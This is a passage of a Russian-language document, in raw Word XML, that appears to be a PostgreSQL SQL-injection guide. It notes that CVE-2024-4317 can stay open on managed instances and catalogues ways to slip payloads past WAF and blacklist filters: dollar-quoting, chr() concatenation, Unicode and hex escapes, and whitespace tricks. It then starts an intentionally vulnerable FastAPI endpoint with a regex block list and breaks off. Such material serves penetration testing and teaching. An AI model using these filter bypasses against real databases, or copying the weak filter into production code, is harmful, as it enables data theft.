    <w:p w14:paraId="0EAB0D3F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — версия включает кастомный suffix (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-rds-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-google-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_settings</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> частично masked; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_extension</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> показывает преинсталлированный набор провайдера → мгновенный fingerprint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5327E36E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.6 R17 (CVE-2024-4317)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — может оставаться открытой на managed-инстансах, даже если minor patch применён, потому что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`fix-CVE-2024-4317.sql` не выполняется автоматически</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> при provider-managed upgrade. Это специфика managed: на self-hosted DBA либо запускает скрипт сразу при апгрейде, либо не апгрейдится вообще; на managed апгрейд автоматический, а ручной шаг забывается.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4CDFFB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.6 R26</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — фикс через бинарь, применяется автоматически в maintenance window. До window — инстанс на managed уязвим так же, как self-hosted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C398509" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Детально по провайдерам и таблицы патч-окон — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.9 Managed-провайдеры: RDS, Cloud SQL, Supabase</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B196D6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.9.0 Обзор</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F49797" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Категория 3.9 — про </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>обход символьных и лексических фильтров</w:t>
      </w:r>
      <w:r>
        <w:t>, которые ставят между пользовательским вводом и базой данных. Сами payload-ы из 3.1–3.8 — UNION, dblink, pg_read_file и т.п. — здесь не меняются по существу; меняется их кодировка, чтобы протолкнуть payload через WAF, blacklist в коде приложения или sanitizer-функцию, блокирующую конкретные символы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или ключевые слова (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION</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OR 1=1</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A683B79" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В отличие от 3.1–3.8 — где целевая «жертва» это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQL-builder в приложении</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, который конкатенирует строки — здесь целевая жертва это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>фильтр на входе</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (WAF, blacklist-regex в коде, sanitization-функция). Если фильтр пропустил payload, дальше всё работает по обычным правилам соответствующей категории атаки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBE4C9A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Когда применять</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8D79E6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WAF (ModSecurity / CRS / Cloudflare / AWS WAF / Imperva)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — ставит regex-правила на тело запроса. CRS правила SQLi (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>942100</w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>942521</w:t>
      </w:r>
      <w:r>
        <w:t>) ловят популярные сигнатуры; PG-специфичные обходы из 3.9 часто не покрыты.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548A511C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Blacklist в коде</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — самописная функция «уберём </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> из параметра», </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if "DROP" in payload: reject</w:t>
      </w:r>
      <w:r>
        <w:t>, и т.п. Это распространённый антипаттерн; почти любой подраздел 3.9 такой фильтр обходит.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59566FDE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Whitelist на типы, но не на содержимое</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — параметр объявлен как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r>
        <w:t>, проходит type-check, но содержимое не валидируется. 3.9.6 (regex/whitespace tricks) часто эксплуатирует такие случаи.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640E898A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Не применять, если ввод действительно идёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>через параметризацию</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$1</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в API драйвера, не f-string). 3.9 не побеждает параметризацию — она побеждает фильтрацию строкового payload-а. Если параметризация в коде есть и работает (см. 2.1 и 3.5), любая 3.9-кодировка просто попадёт в значение параметра как литерал, не интерпретируется как SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBF5092" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Карта подразделов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7282B7EB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Dollar-quoted strings </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$...$$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$tag$...$tag$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (R5) — альтернатива одинарной кавычке для литералов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD6AC22" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>chr()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + конкатенация — собрать строку по байтам, не используя символьные литералы вообще</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15964E46" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Unicode escape </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>U&amp;'\0027'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — спецификация SQL/Unicode для построения литералов через codepoint-ы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42459691" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Escape strings </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>E'\x27'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — backslash-escape с hex/octal byte literals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AE08EE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>convert_from(decode('27...', 'hex'), 'UTF8')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — построение строки через декодирование hex/base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6999342D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Регистр keywords, whitespace tricks — обход case-sensitive blacklist, использование </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/**/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t>, Unicode-пробелов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35739883" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Обзор CVE-2025-1094 (encoding-bypass в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>psql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, R6) — отдельный класс обхода через невалидный UTF-8 в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PQescapeLiteral</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PQescapeIdentifier</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; полный разбор — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAEB53B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Тестовый эндпоинт (используется в 3.9.1–3.9.7 как общий уязвимый код)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6B5187" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Все подразделы 3.9.x используют один и тот же FastAPI-эндпоинт с двойным фильтром на входе. Чтобы не дублировать его в каждой карточке, опишем здесь — в </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">подразделах будет указано «уязвимый код — см. 3.9.0» и приведён </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>только тот payload</w:t>
      </w:r>
      <w:r>
        <w:t>, который обходит соответствующий конкретный фильтр.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5323919E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/api/v1/search.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169631B1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>import re</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFD1E3B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7D897C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from fastapi import APIRouter, Depends, HTTPException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1041E6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBCE519"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75ADFA66" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6C00E2"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006AB240" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1844F40E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>router = APIRouter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28537669" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F25766" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Реалистичный pattern-based WAF — НЕ блокирует `'` целиком (легитимные O'Brien),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000FBD90" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># а ловит опасные сочетания символов с ключевыми словами и опасные функции/каталоги.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E7DC71" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BLOCKED_PATTERNS = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3800DA2B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"'\s*(OR|AND)\s+", re.IGNORECASE),       # 'OR / 'AND — инъекционные шаблоны</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BE7DEA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\bUNION\s+SELECT\b", re.IGNORECASE),    # классический UNION-канал</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF128C4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
